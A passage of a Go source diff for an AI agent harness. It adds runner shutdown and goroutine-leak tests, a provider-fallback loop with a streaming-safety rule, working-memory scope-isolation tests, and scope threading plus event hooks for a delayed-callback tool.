+	deadline := time.Now().Add(2 * time.Second)
+	for time.Now().Before(deadline) {
+		runtime.GC()
+		if runtime.NumGoroutine() <= baseline {
+			return
+		}
+		time.Sleep(20 * time.Millisecond)
+	}
+	// Timed out — dump stack and fail.
+	buf := make([]byte, 1<<20) // 1 MiB
+	n := runtime.Stack(buf, true)
+	t.Fatalf("goroutine leak: NumGoroutine()=%d > baseline=%d after 2s\n%s",
+		runtime.NumGoroutine(), baseline, buf[:n])
+}
+
+// shutdownStubProvider is a minimal Provider that returns a single non-empty
+// content response so that the run completes in one turn, without importing
+// fakeprovider (which would cause an import cycle: harness ← fakeprovider ← harness).
+type shutdownStubProvider struct{}
+
+func (s *shutdownStubProvider) Complete(_ context.Context, _ CompletionRequest) (CompletionResult, error) {
+	return CompletionResult{Content: "ok"}, nil
+}
+
+// hangingProvider blocks Complete until Release() is called or ctx is cancelled.
+// Used to occupy a worker slot during Shutdown tests.
+type hangingProvider struct {
+	releaseCh chan struct{}
+	once      sync.Once
+}
+
+func newHangingProvider() *hangingProvider {
+	return &hangingProvider{releaseCh: make(chan struct{})}
+}
+
+func (h *hangingProvider) Complete(ctx context.Context, _ CompletionRequest) (CompletionResult, error) {
+	select {
+	case <-h.releaseCh:
+		return CompletionResult{Content: "released"}, nil
+	case <-ctx.Done():
+		return CompletionResult{}, ctx.Err()
+	}
+}
+
+func (h *hangingProvider) Release() {
+	h.once.Do(func() { close(h.releaseCh) })
+}
+
+// TestRunnerShutdownStopsPoolDispatcher verifies that:
+//  1. Shutdown closes the poolDispatcher goroutine (no goroutine leak).
+//  2. StartRun after Shutdown returns ErrRunnerClosed.
+func TestRunnerShutdownStopsPoolDispatcher(t *testing.T) {
+	// Capture baseline BEFORE NewRunner so the poolDispatcher goroutine is NOT
+	// included in the baseline count.
+	baseline := runtime.NumGoroutine()
+
+	r := NewRunner(&shutdownStubProvider{}, nil, RunnerConfig{
+		WorkerPoolSize: 4,
+		DefaultModel:   "gpt-4.1-mini",
+	})
+
+	// Start two runs and drain each to a terminal event so all execute()
+	// goroutines launched by poolDispatcher exit before we call Shutdown.
+	for i := 0; i < 2; i++ {
+		run, err := r.StartRun(RunRequest{Prompt: "hello"})
+		require.NoError(t, err)
+		_, err = collectRunEvents(t, r, run.ID)
+		require.NoError(t, err)
+	}
+
+	// Shutdown must succeed without error.
+	require.NoError(t, r.Shutdown(context.Background()))
+
+	// Starting a run after Shutdown must return ErrRunnerClosed.
+	_, err := r.StartRun(RunRequest{Prompt: "should fail"})
+	require.True(t, errors.Is(err, ErrRunnerClosed),
+		"expected ErrRunnerClosed, got %v", err)
+
+	// The poolDispatcher goroutine must have exited.
+	assertNoRunnerGoroutineLeak(t, baseline)
+}
+
+// TestRunnerShutdownDrainsBufferedQueue is a regression test for the critical
+// liveness bug where Shutdown could hang indefinitely because items enqueued
+// into the buffered runQueue after r.done was closed were never drained, so
+// r.inflight.Wait() in Shutdown blocked forever.
+//
+// Setup: WorkerPoolSize=1, occupy the single slot with a hanging provider,
+// then fire a second StartRun that is forced onto the buffered queue. Call
+// Shutdown concurrently and assert it returns within a short deadline and that
+// inflight reaches zero (no goroutine leak).
+func TestRunnerShutdownDrainsBufferedQueue(t *testing.T) {
+	hp := newHangingProvider()
+	r := NewRunner(hp, nil, RunnerConfig{
+		WorkerPoolSize: 1,
+		DefaultModel:   "gpt-4.1-mini",
+	})
+
+	// Start run 1: occupies the single worker slot (hangs in Complete).
+	run1, err := r.StartRun(RunRequest{Prompt: "hang"})
+	require.NoError(t, err)
+
+	// Wait briefly to ensure the worker slot is occupied before continuing.
+	time.Sleep(30 * time.Millisecond)
+
+	// Start run 2: no slot available, so it is pushed onto the buffered runQueue.
+	// It may succeed or fail with ErrRunnerClosed depending on the race; either
+	// is acceptable — the key invariant is that Shutdown returns promptly.
+	_, _ = r.StartRun(RunRequest{Prompt: "queued"})
+
+	// Shutdown concurrently — this must NOT hang forever.
+	shutdownDone := make(chan error, 1)
+	go func() {
+		// Release the hanging run so execute() can finish and inflight.Done() is called.
+		// We release after a tiny delay to allow Shutdown to start waiting.
+		time.Sleep(10 * time.Millisecond)
+		hp.Release()
+		shutdownDone <- r.Shutdown(context.Background())
+	}()
+
+	select {
+	case err := <-shutdownDone:
+		require.NoError(t, err, "Shutdown must not return an error")
+	case <-time.After(5 * time.Second):
+		t.Fatal("Shutdown hung: inflight.Wait() never unblocked (buffered-queue drain regression)")
+	}
+
+	// Verify run 1 reached a terminal state (provider was released).
+	_, err = collectRunEvents(t, r, run1.ID)
+	require.NoError(t, err)
+}
+
+// TestRunnerShutdownContinueRunRevertsSourceState is a regression test for the
+// major bug where ContinueRunWithOptions set state.continued=true on the source
+// run BEFORE dispatching, and on dispatch failure never reverted it — leaving
+// the source run permanently non-continuable even though no continuation ran.
+func TestRunnerShutdownContinueRunRevertsSourceState(t *testing.T) {
+	r := NewRunner(&shutdownStubProvider{}, nil, RunnerConfig{
+		WorkerPoolSize: 0, // unbounded, simpler setup
+		DefaultModel:   "gpt-4.1-mini",
+	})
+
+	// Run a completed run.
+	run, err := r.StartRun(RunRequest{Prompt: "hello"})
+	require.NoError(t, err)
+	_, err = collectRunEvents(t, r, run.ID)
+	require.NoError(t, err)
+
+	// Shut down the runner so that dispatchRun returns ErrRunnerClosed.
+	require.NoError(t, r.Shutdown(context.Background()))
+
+	// ContinueRun must return ErrRunnerClosed (or a wrapped form) and must NOT
+	// leave state.continued=true on the source run.
+	_, contErr := r.ContinueRun(run.ID, "follow up")
+	// We expect ErrRunnerClosed because the runner is shut down.
+	require.True(t, errors.Is(contErr, ErrRunnerClosed),
+		"expected ErrRunnerClosed, got %v", contErr)
+
+	// Source run's continued flag must not have been permanently set.
+	// We verify by re-reading the state under the lock.
+	r.mu.RLock()
+	state, ok := r.runs[run.ID]
+	r.mu.RUnlock()
+	if ok {
+		// State may have been removed; only check if still present.
+		require.False(t, state.continued,
+			"source run.continued must be false after failed continuation dispatch")
+	}
+}
+
+// TestRunnerWithoutShutdownLeaksDispatcher is the control case: without
+// Shutdown, the poolDispatcher goroutine stays alive, proving the stack-scan
+// detector actually catches the parked goroutine. Shutdown is called at the
+// end to clean up the test process so no goroutine leaks into other tests.
+//
+// Approach: poll the full goroutine stack dump (runtime.Stack(all=true)) for
+// the "poolDispatcher" frame rather than relying on a fragile goroutine count,
+// which is perturbed by the testing framework and the Go runtime itself. This
+// is deterministic: the frame is present iff the goroutine is alive.
+func TestRunnerWithoutShutdownLeaksDispatcher(t *testing.T) {
+	r := NewRunner(&shutdownStubProvider{}, nil, RunnerConfig{
+		WorkerPoolSize: 4,
+		DefaultModel:   "gpt-4.1-mini",
+	})
+
+	// Run to terminal so the execute goroutine exits; only poolDispatcher stays.
+	run, err := r.StartRun(RunRequest{Prompt: "hello"})
+	require.NoError(t, err)
+	_, err = collectRunEvents(t, r, run.ID)
+	require.NoError(t, err)
+
+	// PART 1: assert that poolDispatcher is PRESENT before Shutdown.
+	// Poll up to 1 s for the goroutine to park in the select.
+	deadline := time.Now().Add(1 * time.Second)
+	var present bool
+	for time.Now().Before(deadline) {
+		if runnerGoroutineStackContains("poolDispatcher") {
+			present = true
+			break
+		}
+		time.Sleep(10 * time.Millisecond)
+	}
+	require.True(t, present,
+		"control assertion failed: poolDispatcher goroutine not found in stack dump before Shutdown; the leak detector would not catch a leak")
+
+	// PART 2: call Shutdown and assert that poolDispatcher is ABSENT afterwards.
+	require.NoError(t, r.Shutdown(context.Background()))
+
+	deadline = time.Now().Add(2 * time.Second)
+	var absent bool
+	for time.Now().Before(deadline) {
+		runtime.GC()
+		if !runnerGoroutineStackContains("poolDispatcher") {
+			absent = true
+			break
+		}
+		time.Sleep(20 * time.Millisecond)
+	}
+	require.True(t, absent,
+		"poolDispatcher goroutine still present in stack dump after Shutdown; Shutdown did not clean it up")
+}
+
+// TestRunnerShutdownIdempotent verifies that calling Shutdown twice does not
+// panic or return an error.
+func TestRunnerShutdownIdempotent(t *testing.T) {
+	r := NewRunner(&shutdownStubProvider{}, nil, RunnerConfig{
+		WorkerPoolSize: 2,
+		DefaultModel:   "gpt-4.1-mini",
+	})
+	require.NoError(t, r.Shutdown(context.Background()))
+	require.NoError(t, r.Shutdown(context.Background()))
+}
+
+// TestRunnerShutdownUnboundedMode verifies that Shutdown works correctly when
+// WorkerPoolSize == 0 (unbounded / legacy mode — no poolDispatcher goroutine).
+func TestRunnerShutdownUnboundedMode(t *testing.T) {
+	baseline := runtime.NumGoroutine()
+
+	r := NewRunner(&shutdownStubProvider{}, nil, RunnerConfig{
+		WorkerPoolSize: 0, // unbounded
+		DefaultModel:   "gpt-4.1-mini",
+	})
+
+	run, err := r.StartRun(RunRequest{Prompt: "hello"})
+	require.NoError(t, err)
+	_, err = collectRunEvents(t, r, run.ID)
+	require.NoError(t, err)
+
+	require.NoError(t, r.Shutdown(context.Background()))
+
+	// StartRun after Shutdown should return ErrRunnerClosed.
+	_, err = r.StartRun(RunRequest{Prompt: "nope"})
+	require.True(t, errors.Is(err, ErrRunnerClosed),
+		"expected ErrRunnerClosed, got %v", err)
+
+	assertNoRunnerGoroutineLeak(t, baseline)
+}

--- a/internal/harness/runner_step_engine.go
+++ b/internal/harness/runner_step_engine.go
@@ -70,6 +70,7 @@ func (se *stepEngine) run() {
 	model := preflight.model
 	primaryModel := preflight.primaryModel
 	activeProvider := preflight.activeProvider
+	providerCandidates := preflight.providerCandidates
 	systemPrompt := preflight.systemPrompt
 	resolvedPrompt := preflight.resolvedPrompt
 	runStartedAt := preflight.runStartedAt
@@ -315,12 +316,20 @@ func (se *stepEngine) run() {
 			}
 		}
 
+		// deltaEmitted tracks whether any streaming delta has been emitted to the
+		// client during this turn.  It is set atomically by the Stream closure and
+		// read by the fallback loop.  When a delta has already been delivered we
+		// must NOT fall back to another provider — the client has already received
+		// partial output and switching would produce inconsistent results.
+		var deltaEmitted atomic.Bool
+
 		completionReq := CompletionRequest{
 			Model:           primaryModel,
 			Messages:        turnMessages,
 			Tools:           r.filteredToolsForRun(runID),
 			ReasoningEffort: req.ReasoningEffort,
 			Stream: func(delta CompletionDelta) {
+				deltaEmitted.Store(true)
 				r.emitCompletionDelta(runID, step, delta)
 			},
 		}
@@ -362,15 +371,94 @@ func (se *stepEngine) run() {
 			r.emit(runID, EventLLMRequestSnapshot, snapshotPayload)
 		}
 
+		// --- Provider fallback loop ---
+		// Iterate over the ordered candidate list.  On a fallback-eligible error
+		// (429/5xx) from an earlier candidate, emit a prompt.warning and retry
+		// the same CompletionRequest with the next candidate.  If a streaming
+		// delta has already been emitted, fall back is disallowed (streaming-safety
+		// rule) and we fail the run immediately.
+		//
+		// When AllowFallback is false (or there is only one candidate), the slice
+		// contains exactly one entry so this degenerates to the original behaviour.
+		//
+		// The active candidate is tracked so post-loop code that updates
+		// state.run.ProviderName uses the correct name.
+		if len(providerCandidates) == 0 {
+			// Defensive: preflight always populates at least one entry; fall back to
+			// the pre-existing activeProvider if somehow the slice is empty.
+			providerCandidates = []providerCandidate{{Provider: activeProvider, Name: preflight.providerName}}
+		}
+
 		llmCallStart := time.Now()
-		result, err := activeProvider.Complete(ctx, completionReq)
-		if err != nil {
-			if ctx.Err() != nil {
-				r.cancelledRun(runID)
+		var result CompletionResult
+		var activeCandidateName string
+		{
+			candidateIdx := 0
+			for {
+				candidate := providerCandidates[candidateIdx]
+				activeCandidateName = candidate.Name
+
+				// Reset the delta flag before each attempt so mid-stream detection
+				// is scoped to this particular provider call.
+				deltaEmitted.Store(false)
+
+				result, err = candidate.Provider.Complete(ctx, completionReq)
+				if err == nil {
+					// Success — update the running activeProvider so that rest of
+					// the step loop (and future turns) still have the right reference
+					// when they need it.
+					activeProvider = candidate.Provider
+					break
+				}
+
+				// Context cancelled: hard stop, do not attempt any fallback.
+				if ctx.Err() != nil {
+					r.cancelledRun(runID)
+					return
+				}
+
+				// Streaming-safety: if any delta was delivered to the client,
+				// switching providers would produce an inconsistent partial response.
+				// Fail the run immediately.
+				if deltaEmitted.Load() {
+					r.failRun(runID, fmt.Errorf("provider completion failed: %w", err))
+					return
+				}
+
+				// Check whether the error is fallback-eligible and there is a next
+				// candidate available.
+				nextIdx := candidateIdx + 1
+				if isFallbackEligible(err) && req.AllowFallback && nextIdx < len(providerCandidates) {
+					next := providerCandidates[nextIdx]
+					r.emit(runID, EventPromptWarning, map[string]any{
+						"code":          "provider_fallback",
+						"step":          step,
+						"from_provider": candidate.Name,
+						"to_provider":   next.Name,
+						"reason":        err.Error(),
+						"message": fmt.Sprintf(
+							"provider %q failed (step %d), falling back to %q: %s",
+							candidate.Name, step, next.Name, err.Error(),
+						),
+					})
+					// Optionally update run state so observability sees the new provider.
+					r.mu.Lock()
+					if st, ok := r.runs[runID]; ok {
+						st.run.ProviderName = next.Name
+					}
+					r.mu.Unlock()
+					r.emit(runID, EventProviderResolved, map[string]any{
+						"model":    primaryModel,
+						"provider": next.Name,
+					})
+					candidateIdx = nextIdx
+					continue
+				}
+
+				// Non-eligible error or no more candidates: fail the run.
+				r.failRun(runID, fmt.Errorf("provider completion failed: %w", err))
 				return
 			}
-			r.failRun(runID, fmt.Errorf("provider completion failed: %w", err))
-			return
 		}
 		llmTotalDurationMs := result.TotalDurationMs
 		if llmTotalDurationMs == 0 {
@@ -406,6 +494,7 @@ func (se *stepEngine) run() {
 			"tool_calls":        len(result.ToolCalls),
 			"total_duration_ms": llmTotalDurationMs,
 			"ttft_ms":           result.TTFTMs,
+			"provider":          activeCandidateName,
 		})
 
 		if causalBuilder != nil {
@@ -1131,10 +1220,10 @@ func (se *stepEngine) run() {
 	// Determine which budget was exhausted and emit the appropriate event.
 	if effectiveMaxTurns > 0 {
 		r.emit(runID, EventMaxTurnsExhausted, map[string]any{
-			"run_id":    runID,
-			"step":      step,
+			"run_id":     runID,
+			"step":       step,
 			"turn_count": step - 1,
-			"max_turns": effectiveMaxTurns,
+			"max_turns":  effectiveMaxTurns,
 		})
 	}
 	if effectiveMaxSteps > 0 {

--- a/internal/harness/runner_test.go
+++ b/internal/harness/runner_test.go
@@ -2353,7 +2353,7 @@ func (f *failingConversationStore) ListConversations(_ context.Context, _ Conver
 func (f *failingConversationStore) DeleteConversation(_ context.Context, _ string) error {
 	return fmt.Errorf("store delete failed")
 }
-func (f *failingConversationStore) SearchMessages(_ context.Context, _ string, _ int) ([]MessageSearchResult, error) {
+func (f *failingConversationStore) SearchMessages(_ context.Context, _ string, _ string, _ int) ([]MessageSearchResult, error) {
 	return nil, fmt.Errorf("store search failed")
 }
 func (f *failingConversationStore) DeleteOldConversations(_ context.Context, _ time.Time) (int, error) {
@@ -2402,7 +2402,7 @@ func (c *capturingConversationStore) ListConversations(_ context.Context, _ Conv
 func (c *capturingConversationStore) DeleteConversation(_ context.Context, _ string) error {
 	return nil
 }
-func (c *capturingConversationStore) SearchMessages(_ context.Context, _ string, _ int) ([]MessageSearchResult, error) {
+func (c *capturingConversationStore) SearchMessages(_ context.Context, _ string, _ string, _ int) ([]MessageSearchResult, error) {
 	return nil, nil
 }
 func (c *capturingConversationStore) DeleteOldConversations(_ context.Context, _ time.Time) (int, error) {

--- a/internal/harness/runner_working_memory_sqlite_test.go
+++ b/internal/harness/runner_working_memory_sqlite_test.go
@@ -1,0 +1,181 @@
+package harness
+
+import (
+	"context"
+	"encoding/json"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"go-agent-harness/internal/harness/tools/core"
+	om "go-agent-harness/internal/observationalmemory"
+	"go-agent-harness/internal/workingmemory"
+)
+
+// registerWorkingMemoryTool wires the real core.working_memory tool (which keys
+// its scope off RunMetadata, exactly like the runner's injection scopeKey) into
+// a harness registry backed by the given store.
+func registerWorkingMemoryTool(t *testing.T, registry *Registry, store workingmemory.Store) {
+	t.Helper()
+	tool := core.WorkingMemoryTool(store)
+	def := ToolDefinition{
+		Name:         tool.Definition.Name,
+		Description:  tool.Definition.Description,
+		Parameters:   tool.Definition.Parameters,
+		ParallelSafe: tool.Definition.ParallelSafe,
+		Mutating:     tool.Definition.Mutating,
+	}
+	handler := ToolHandler(func(ctx context.Context, args json.RawMessage) (string, error) {
+		return tool.Handler(ctx, args)
+	})
+	if err := registry.Register(def, handler); err != nil {
+		t.Fatalf("register working_memory tool: %v", err)
+	}
+}
+
+// newWorkingMemoryWriterProvider returns a provider whose first turn issues a
+// working_memory `set` tool call (so the run writes a scoped entry via the real
+// tool) and whose second turn returns a final answer.
+func newWorkingMemoryWriterProvider(key, value string) *capturingProvider {
+	return &capturingProvider{
+		turns: []CompletionResult{
+			{ToolCalls: []ToolCall{{
+				ID:        "wm-set",
+				Name:      "working_memory",
+				Arguments: `{"action":"set","key":"` + key + `","value":"` + value + `"}`,
+			}}},
+			{Content: "stored"},
+		},
+	}
+}
+
+// TestRunnerWorkingMemoryCrossRunRecallAndScopeIsolation proves, end-to-end
+// through a REAL SQLite working-memory store, that:
+//  1. A run under tenant A / conversation C / agent G that writes a
+//     working-memory entry (turn 1, via the working_memory tool) persists it.
+//  2. A LATER run on the SAME axes recalls the entry — the runner injects it as
+//     a system message at turn start (cross-run recall via SQLite).
+//  3. A run on a DIFFERENT conversation (same tenant/agent) does NOT see the
+//     entry (scope isolation — no leak across conversations).
+//  4. A run on a DIFFERENT tenant does NOT see the entry (scope isolation — no
+//     leak across tenants).
+func TestRunnerWorkingMemoryCrossRunRecallAndScopeIsolation(t *testing.T) {
+	t.Parallel()
+
+	dbPath := filepath.Join(t.TempDir(), "working_memory.db")
+	store, err := workingmemory.NewSQLiteStore(dbPath)
+	if err != nil {
+		t.Fatalf("NewSQLiteStore: %v", err)
+	}
+	t.Cleanup(func() { _ = store.Close() })
+	if err := store.Migrate(context.Background()); err != nil {
+		t.Fatalf("Migrate: %v", err)
+	}
+
+	const (
+		tenantA = "tenant-A"
+		convC   = "conversation-C"
+		agentG  = "agent-G"
+		wmKey   = "deploy_target"
+		wmValue = "staging-cluster-7"
+	)
+
+	// --- Turn 1 (write): run writes a working-memory entry under A / C / G. ---
+	writeRegistry := NewRegistry()
+	registerWorkingMemoryTool(t, writeRegistry, store)
+	writer := newWorkingMemoryWriterProvider(wmKey, wmValue)
+	writeRunner := NewRunner(writer, writeRegistry, RunnerConfig{
+		DefaultModel:       "test-model",
+		MaxSteps:           4,
+		WorkingMemoryStore: store,
+	})
+	writeRun, err := writeRunner.StartRun(RunRequest{
+		Prompt:         "remember the deploy target",
+		TenantID:       tenantA,
+		ConversationID: convC,
+		AgentID:        agentG,
+	})
+	if err != nil {
+		t.Fatalf("StartRun (write): %v", err)
+	}
+	if got := waitForStatus(t, writeRunner, writeRun.ID, RunStatusCompleted, RunStatusFailed); got != RunStatusCompleted {
+		t.Fatalf("write run status = %s, want completed", got)
+	}
+
+	// Sanity: the entry is durably persisted in SQLite under the A/C/G scope.
+	if value, ok, err := store.Get(context.Background(), scopeKeyFor(tenantA, convC, agentG), wmKey); err != nil {
+		t.Fatalf("store.Get: %v", err)
+	} else if !ok || !strings.Contains(value, wmValue) {
+		t.Fatalf("persisted value = %q (found=%v), want to contain %q", value, ok, wmValue)
+	}
+
+	// --- Turn 2 (recall): a NEW run on the SAME axes recalls the entry. ---
+	recallSnippet := firstSystemMessageForRun(t, store, RunRequest{
+		Prompt:         "what is the deploy target?",
+		TenantID:       tenantA,
+		ConversationID: convC,
+		AgentID:        agentG,
+	})
+	if !strings.Contains(recallSnippet, "<working-memory>") {
+		t.Fatalf("recall: first system message = %q, want a working-memory snippet", recallSnippet)
+	}
+	if !strings.Contains(recallSnippet, wmKey) || !strings.Contains(recallSnippet, wmValue) {
+		t.Fatalf("recall: working-memory snippet = %q, want it to contain %q=%q", recallSnippet, wmKey, wmValue)
+	}
+
+	// --- Isolation: a DIFFERENT conversation does NOT see the entry. ---
+	otherConvSnippet := firstSystemMessageForRun(t, store, RunRequest{
+		Prompt:         "what is the deploy target?",
+		TenantID:       tenantA,
+		ConversationID: "conversation-OTHER",
+		AgentID:        agentG,
+	})
+	if strings.Contains(otherConvSnippet, wmKey) || strings.Contains(otherConvSnippet, wmValue) {
+		t.Fatalf("cross-conversation leak: snippet = %q must not contain %q/%q", otherConvSnippet, wmKey, wmValue)
+	}
+
+	// --- Isolation: a DIFFERENT tenant does NOT see the entry. ---
+	otherTenantSnippet := firstSystemMessageForRun(t, store, RunRequest{
+		Prompt:         "what is the deploy target?",
+		TenantID:       "tenant-B",
+		ConversationID: convC,
+		AgentID:        agentG,
+	})
+	if strings.Contains(otherTenantSnippet, wmKey) || strings.Contains(otherTenantSnippet, wmValue) {
+		t.Fatalf("cross-tenant leak: snippet = %q must not contain %q/%q", otherTenantSnippet, wmKey, wmValue)
+	}
+}
+
+// firstSystemMessageForRun starts a single-turn run (no tool calls) on the
+// given axes against the shared store and returns the content of the first
+// message the runner sent to the provider — i.e. the working-memory injection
+// point at turn start. Empty string when no system message was injected.
+func firstSystemMessageForRun(t *testing.T, store workingmemory.Store, req RunRequest) string {
+	t.Helper()
+	provider := &capturingProvider{turns: []CompletionResult{{Content: "done"}}}
+	runner := NewRunner(provider, NewRegistry(), RunnerConfig{
+		DefaultModel:       "test-model",
+		MaxSteps:           1,
+		WorkingMemoryStore: store,
+	})
+	run, err := runner.StartRun(req)
+	if err != nil {
+		t.Fatalf("StartRun (probe): %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusCompleted, RunStatusFailed)
+	provider.mu.Lock()
+	defer provider.mu.Unlock()
+	if len(provider.calls) == 0 {
+		t.Fatal("probe: expected at least one provider call")
+	}
+	msgs := provider.calls[0].Messages
+	if len(msgs) == 0 {
+		return ""
+	}
+	return msgs[0].Content
+}
+
+// scopeKeyFor mirrors Runner.scopeKey for direct store assertions in tests.
+func scopeKeyFor(tenant, conversation, agent string) om.ScopeKey {
+	return om.ScopeKey{TenantID: tenant, ConversationID: conversation, AgentID: agent}
+}

--- a/internal/harness/runner_working_memory_test.go
+++ b/internal/harness/runner_working_memory_test.go
@@ -9,6 +9,61 @@ import (
 	"go-agent-harness/internal/workingmemory"
 )
 
+// TestScopeKeyNormalization_EmptyRun verifies that scopeKey normalises empty
+// TenantID / ConversationID / AgentID on a run to the same defaults that
+// workingMemoryScopeFromContext uses in the working_memory WRITE tool.
+// Before the fix, the runner READ side used raw empty strings while the tool
+// WRITE side normalised to "default" / runID / "default", so a tool-written
+// entry was never recalled during injection.
+func TestScopeKeyNormalization_EmptyRun(t *testing.T) {
+	t.Parallel()
+
+	provider := &capturingProvider{
+		turns: []CompletionResult{{Content: "done"}},
+	}
+	registry := NewRegistry()
+	memStore := workingmemory.NewMemoryStore()
+
+	runner := NewRunner(provider, registry, RunnerConfig{
+		DefaultModel:       "test-model",
+		MaxSteps:           1,
+		WorkingMemoryStore: memStore,
+	})
+
+	// Start a run with NO explicit ConversationID / TenantID / AgentID so all
+	// three fields are empty on state.run; scopeKey must normalise them.
+	run, err := runner.StartRun(RunRequest{Prompt: "hi"})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusCompleted, RunStatusFailed)
+
+	// scopeKey must resolve to the normalised defaults.
+	sk := runner.scopeKey(run.ID)
+	if sk.TenantID != "default" {
+		t.Errorf("TenantID = %q, want \"default\"", sk.TenantID)
+	}
+	if sk.ConversationID == "" {
+		t.Errorf("ConversationID is empty; want the run ID %q", run.ID)
+	}
+	if sk.AgentID != "default" {
+		t.Errorf("AgentID = %q, want \"default\"", sk.AgentID)
+	}
+
+	// An entry written under the normalised scope must be recalled.
+	writeScope := om.ScopeKey{TenantID: "default", ConversationID: sk.ConversationID, AgentID: "default"}
+	if err := memStore.Set(context.Background(), writeScope, "key1", "value1"); err != nil {
+		t.Fatalf("Set: %v", err)
+	}
+	snippet, snippetErr := memStore.Snippet(context.Background(), sk)
+	if snippetErr != nil {
+		t.Fatalf("Snippet: %v", snippetErr)
+	}
+	if !strings.Contains(snippet, "key1") {
+		t.Errorf("working memory snippet = %q, want it to contain \"key1\"", snippet)
+	}
+}
+
 func TestRunnerInjectsWorkingMemoryBeforeObservationalMemory(t *testing.T) {
 	t.Parallel()
 

--- a/internal/harness/tools/deferred/delayed_callback.go
+++ b/internal/harness/tools/deferred/delayed_callback.go
@@ -54,7 +54,13 @@ func SetDelayedCallbackTool(mgr *tools.CallbackManager) tools.Tool {
 			return "", fmt.Errorf("set_delayed_callback: no run metadata in context")
 		}
 
-		info, err := mgr.Set(md.ConversationID, delay, args.Prompt)
+		info, err := mgr.Set(tools.SetRequest{
+			ConversationID: md.ConversationID,
+			Delay:          delay,
+			Prompt:         args.Prompt,
+			TenantID:       md.TenantID,
+			AgentID:        md.AgentID,
+		})
 		if err != nil {
 			return "", fmt.Errorf("set_delayed_callback failed: %w", err)
 		}

--- a/internal/harness/tools/delayed_callback.go
+++ b/internal/harness/tools/delayed_callback.go
@@ -21,8 +21,61 @@ const (
 
 // RunStarter is the interface for starting a new run on a conversation.
 // Implemented by the runner; injected via lazy adapter to avoid circular deps.
+//
+// tenantID and agentID carry the originating run's scope so a callback fired
+// from a tenant- or agent-scoped conversation starts its follow-up run on the
+// SAME scope. Without them the follow-up run is denied access to the scoped
+// conversation at fire time (a direct autonomy breaker). Both may be empty for
+// the default/unscoped case.
 type RunStarter interface {
-	StartRun(prompt, conversationID string) error
+	StartRun(prompt, conversationID, tenantID, agentID string) error
+}
+
+// SetRequest carries the parameters for scheduling a delayed callback. It is a
+// small struct (rather than a long positional argument list) so the run scope
+// (tenant + agent) can be threaded through Set -> fire -> StartRun without
+// repeated signature churn.
+type SetRequest struct {
+	ConversationID string
+	Delay          time.Duration
+	Prompt         string
+	// TenantID and AgentID capture the originating run's scope so the fired
+	// follow-up run is started on the same tenant + agent. Both may be empty
+	// for the default/unscoped case.
+	TenantID string
+	AgentID  string
+}
+
+// CallbackEvents is an optional sink for callback lifecycle notifications.
+// The CallbackManager calls Emit when a callback is scheduled, fires, or is
+// canceled. The event name matches the harness EventType string values
+// ("callback.scheduled", "callback.fired", "callback.canceled"); the manager
+// uses plain strings to avoid importing the runner event bus (no import cycle).
+//
+// Implementations MUST be safe for concurrent use and MUST NOT call back into
+// the CallbackManager. A nil sink disables emission entirely.
+type CallbackEvents interface {
+	Emit(event string, info CallbackInfo)
+}
+
+// Event name constants for the callback lifecycle. These mirror the harness
+// EventType string values but live here so the tools package stays free of a
+// dependency on the runner.
+const (
+	eventCallbackScheduled = "callback.scheduled"
+	eventCallbackFired     = "callback.fired"
+	eventCallbackCanceled  = "callback.canceled"
+)
+
+// CallbackOption configures a CallbackManager at construction time.
+type CallbackOption func(*CallbackManager)
+
+// WithEventSink wires an optional CallbackEvents sink onto the manager so
+// callback lifecycle events are observable. Passing a nil sink is a no-op.
+func WithEventSink(sink CallbackEvents) CallbackOption {
+	return func(m *CallbackManager) {
+		m.events = sink
+	}
 }
 
 // CallbackState represents the lifecycle state of a callback.
@@ -43,6 +96,12 @@ type CallbackInfo struct {
 	State          CallbackState `json:"state"`
 	FiresAt        time.Time     `json:"fires_at"`
 	CreatedAt      time.Time     `json:"created_at"`
+	// TenantID and AgentID capture the originating run's scope so the fired
+	// follow-up run is started on the same tenant + agent. Both may be empty
+	// for the default/unscoped case. Omitted from JSON when empty to preserve
+	// the existing tool-result shape for unscoped callbacks.
+	TenantID string `json:"tenant_id,omitempty"`
+	AgentID  string `json:"agent_id,omitempty"`
 }
 
 type pendingCallback struct {
@@ -58,20 +117,69 @@ type CallbackManager struct {
 	starter   RunStarter
 	now       func() time.Time
 	stopped   bool
+	// events is an optional sink for callback lifecycle notifications. Nil by
+	// default (no emission). Set via WithEventSink. Read-only after construction.
+	events CallbackEvents
 }
 
-// NewCallbackManager creates a new CallbackManager.
-func NewCallbackManager(starter RunStarter) *CallbackManager {
-	return &CallbackManager{
+// NewCallbackManager creates a new CallbackManager. Optional CallbackOption
+// values (e.g. WithEventSink) configure observability; the zero-option call
+// NewCallbackManager(starter) remains valid and emits no events.
+func NewCallbackManager(starter RunStarter, opts ...CallbackOption) *CallbackManager {
+	m := &CallbackManager{
 		callbacks: make(map[string]*pendingCallback),
 		byConv:    make(map[string][]string),
 		starter:   starter,
 		now:       time.Now,
 	}
+	for _, opt := range opts {
+		if opt != nil {
+			opt(m)
+		}
+	}
+	return m
 }
 
-// Set schedules a new delayed callback.
-func (m *CallbackManager) Set(conversationID string, delay time.Duration, prompt string) (CallbackInfo, error) {
+// emitEvent forwards a callback lifecycle event to the configured sink, if any.
+// It is always called OUTSIDE the manager lock so the sink cannot deadlock or
+// re-enter the manager while it holds m.mu.
+func (m *CallbackManager) emitEvent(event string, info CallbackInfo) {
+	if m.events == nil {
+		return
+	}
+	m.events.Emit(event, info)
+}
+
+// removeFromByConv removes id from the per-conversation byConv slice, freeing
+// the slot for future callbacks. It prunes the map entry when the slice
+// becomes empty. Callers MUST hold m.mu.
+func (m *CallbackManager) removeFromByConv(convID, id string) {
+	ids := m.byConv[convID]
+	for i, v := range ids {
+		if v == id {
+			// Swap-remove: replace the found element with the last, then shorten.
+			ids[i] = ids[len(ids)-1]
+			ids[len(ids)-1] = "" // zero for GC
+			ids = ids[:len(ids)-1]
+			break
+		}
+	}
+	if len(ids) == 0 {
+		delete(m.byConv, convID)
+	} else {
+		m.byConv[convID] = ids
+	}
+}
+
+// Set schedules a new delayed callback. The SetRequest carries the
+// conversation, delay, prompt, and the originating run's scope (tenant +
+// agent); the scope is stored on the callback and threaded through to StartRun
+// when the callback fires so the follow-up run runs on the same tenant + agent.
+func (m *CallbackManager) Set(req SetRequest) (CallbackInfo, error) {
+	conversationID := req.ConversationID
+	delay := req.Delay
+	prompt := req.Prompt
+
 	if delay < MinCallbackDelay {
